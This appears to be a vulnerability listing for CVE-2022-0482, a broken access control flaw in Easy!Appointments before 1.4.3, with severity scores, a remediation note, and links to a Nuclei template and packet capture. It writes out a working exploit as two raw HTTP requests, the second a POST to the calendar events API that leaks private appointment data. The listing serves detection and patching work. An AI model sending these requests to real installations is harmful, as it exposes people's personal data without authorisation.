| Title | Easy!Appointments <1.4.3 - Broken Access Control |
|---|---|
| Author | francescocarlucci,opencirt |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to gain unauthorized access to sensitive data or perform unauthorized actions. |
| Remediation | Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability. |
| CVSS Score | 9.1 |
| EPSS Score | 0.93282 |
| CVE ID | CVE-2022-0482 |
| CWE ID | CWE-359,CWE-863 |
| Tags | cve cve2022 easyappointments huntr wordpress vkev vuln |
Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Encoding: gzip
POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15
Connection: close
Content-Length: 56
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
csrfToken=6oSnmv&startDate=2022-01-01&endDate=2022-01-01
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0482.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-0482.pcap
N/AN/A